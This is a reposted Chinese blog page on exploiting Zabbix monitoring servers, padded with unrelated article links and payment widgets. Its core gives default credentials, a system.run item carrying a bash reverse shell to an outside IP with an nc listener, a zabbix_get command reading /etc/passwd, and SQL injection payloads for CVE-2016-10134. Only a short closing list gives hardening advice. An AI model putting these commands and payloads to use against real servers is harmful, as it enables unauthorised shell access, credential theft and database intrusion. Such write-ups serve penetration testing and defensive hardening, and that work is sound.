3.1.1 zabbix(上)3.1.2 zabbix(下)

最新推荐文章于 2024-05-19 23:31:10 发布
最新推荐文章于 2024-05-19 23:31:10 发布
阅读量50 收藏
点赞数
文章标签: 运维 php shell
原文链接:https://my.oschina.net/nova12315/blog/3049163
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

常见运维漏洞-Zabbix漏洞

zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营; 并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

Zabbix配置不当安全事件

sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627

京东某站shell直入jae内网物理机内核版本过低 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349

Zabbix弱口令利用

zabbix默认的口令为Admin:zabbix,以及存在guest密码为空 Zabbix server可以远程在agent的机器上执行任意命令 建立监控项 zabbix_get命令调用

system.run[command,<mode>]

这个模块是agent自带的,获取服务器shell,获取root权限。 监控项:

bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
zabbix_get命令调用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'

Zabbix 注入利用

latest.php SQL注入漏洞(CVE-2016-10134)

Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

Zabbix攻击方法

默认口令 注入漏洞 BurpSuite爆破口令

•修复建议

•不要放外网 •修改默认密码 •禁用guest用户 •不要以root启动 •401认证 •备份数据 -> 升级版本

转载于:https://my.oschina.net/nova12315/blog/3049163

weixin_33728708
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2018年高中数学第三章不等式3.1不等关系3.1.1不等关系3.1.2不等关系与不等式达标练习北师大版必修5201806293
09-10
2018年高中数学第三章不等式3.1不等关系3.1.1不等关系3.1.2不等关系与不等式达标练习北师大版必修520180629340
Centos7下zabbix安装与部署
BUse的博客
01-17 843
1.Zabbix介绍 zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以...
CentOS应用-Zabbix运维
一个热爱生活的运维小伙
11-30 982
Zabbix是一个开源的网络监控和报警系统,用于监测和管理网络设备、服务器、虚拟机、应用程序和服务的性能和可用性。它可以收集和分析各种指标,如CPU使用率、内存使用率、网络流量、磁盘空间等,并提供实时监控、报警、数据分析和可视化等功能。
Zabbix监控部署流程
lnw901019的博客
04-13 356
** 一,部署zabbix ** 1.部署环境—LNMP环境 1.1 安装NGINX 1.12 ** [root@zabbixserver ~]# yum -y install gcc pcre-devel openssl-devel [root@zabbixserver ~]# tar -xf nginx-1.12.2.tar.gz [root@zabbixserver ~]# cd ngin...
zabbix5.0-自定义监控项
weixin_47647077的博客
07-31 865
1、agengt配置 在zabbix-agent.conf配置文件中有这样的配置: ### Option: UserParameter # User-defined parameter to monitor. There can be several user-defined parameters. # Format: UserParameter=<key>,<shell command> (自建监控项的实例) # See 'zab
全国通用版2018_2019高中数学第三章概率3.1.1随机现象3.1.2事件与基本事件空间练习新人教B版必修3
08-06
全国通用版2018_2019高中数学第三章概率3.1.1随机现象3.1.2事件与基本事件空间练习新人教B版必修3
2019_2020学年高中数学第3章概率3.1事件与概率3.1.1随机现象3.1.2事件与基本事件空间练习新人教B版必修3
09-09
2019_2020学年高中数学第3章概率3.1事件与概率3.1.1随机现象3.1.2事件与基本事件空间练习新人教B版必修3
2019_2020学年高中数学第3章数系的扩充与复数3.1.1实数系3.1.2复数的概念应用案巩固提升新人教B版选修2_2
09-09
2019_2020学年高中数学第3章数系的扩充与复数3.1.1实数系3.1.2复数的概念应用案巩固提升新人教B版选修2_2
3.1.1-3.1.2事件与概率[归类].pdf
10-10
3.1.1-3.1.2事件与概率[归类].pdf
docker中安装jenkins,并在node和cloud上跑通基于源码控制SCM的pipeline
qq_29022265的博客
05-19 1190
从安装jenkins到创建jenkins的node和cloud,最后再将scm和FreeStyle两种流水线跑通。
Docker:基础概念、常用命令
想听风雨的博客
05-17 547
Docker:基础概念、常用命令
[每周一更]-(第97期):认识Podman,并对比Docker
最新发布
hmx224_2014的专栏
05-19 1031
Podman 和 Docker 都是流行的容器引擎,用于创建、运行和管理容器。此外,Podman 还支持 SELinux 和 AppArmor 等安全功能,可以进一步增强容器的安全性。在使用 Docker 之前,您需要先启动 Docker 守护进程,守护进程在后台运行,并负责容器的生命周期管理。例如,您可以使用 Buildah 构建自定义容器镜像,然后使用 Podman 运行这些镜像。Podman 的使用与 Docker 非常相似。例如,在内存不足的设备上运行容器时,Podman 可以提供更好的性能。
使用grafana beyla作为ebpf无侵入式trace收集工具
神棍之路
05-17 932
Beyla 使用 eBPF 自动检查应用程序可执行文件和操作系统网络层,并捕获与 Web 事务相关的跟踪跨度和 Linux HTTP/S 和 gRPC 服务的 Rate Errors Duration (RED) 指标,而无需对应用程序代码或配置进行任何修改。它使用 eBPF 自动检查应用程序可执行文件和操作系统网络层,并捕获与 Web 事务相关的跟踪跨度和 Linux HTTP/S 和 gRPC 服务的 Rate Errors Duration (RED) 指标,而无需对应用程序代码或配置进行任何修改.
mysql事务(原理)
m0_74347016的博客
05-19 658
mysql事务原理
用docker命令行操作远程的Dockerd daemon服务
zhang197093的博客
05-15 522
本地安装Dockerd服务太耗本机磁盘空间了,共用已有的Dockerd服务能够节省一部分空间。
jenkins插件之xunit
made4971的博客
05-17 364
填写一下命令,这个命令是docker中执行phpunit单元测试,请根据你的实际情况调整php执行文件路径。一章中phpunit.xml中配置的junit生成结果的地址需要保持一致。在测试报告列填写reports/junit.xml , 注意此处地址和。您的项目 - 配置 - Build Steps, 新增。您的项目 - 配置 - 构建后操作, 新增。Build Step选择 执行SHELL。超时时间根据实际情况配置。搜索xunit并安装。
Docker&K8s
qq_45887694的博客
05-17 691
用于构建容器化平台的软件,进程管理软件,主要用于部署应用程序并守护应用进程。容器是由docker软件启动的业务集成,该进程由docker全权管理。容器是进程,由内核机制来完成容器隔离。docker软件包含客户端和服务器,本机客户端和服务器通过Unix套接字通讯。docker服务端通过接受客户端请求来管理容器进程和镜像。
环境磁盘扩缩容方案datanode磁盘扩容
王羲之的之的博客
05-17 101
确定block副本统计正常,无丢块,无under-replicated 块后台执行命令检查新盘初始化。
maven3.1.1
08-30
Maven 3.1.1 在Maven 3.1.0 基础上进行了一些更新和修复。它提供了更稳定和高效的构建流程,并改善了Maven的性能和可用性。一些关键的特性包括: 1. 并行构建:Maven 3.1.1 支持并行构建,可以根据项目的依赖关系和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值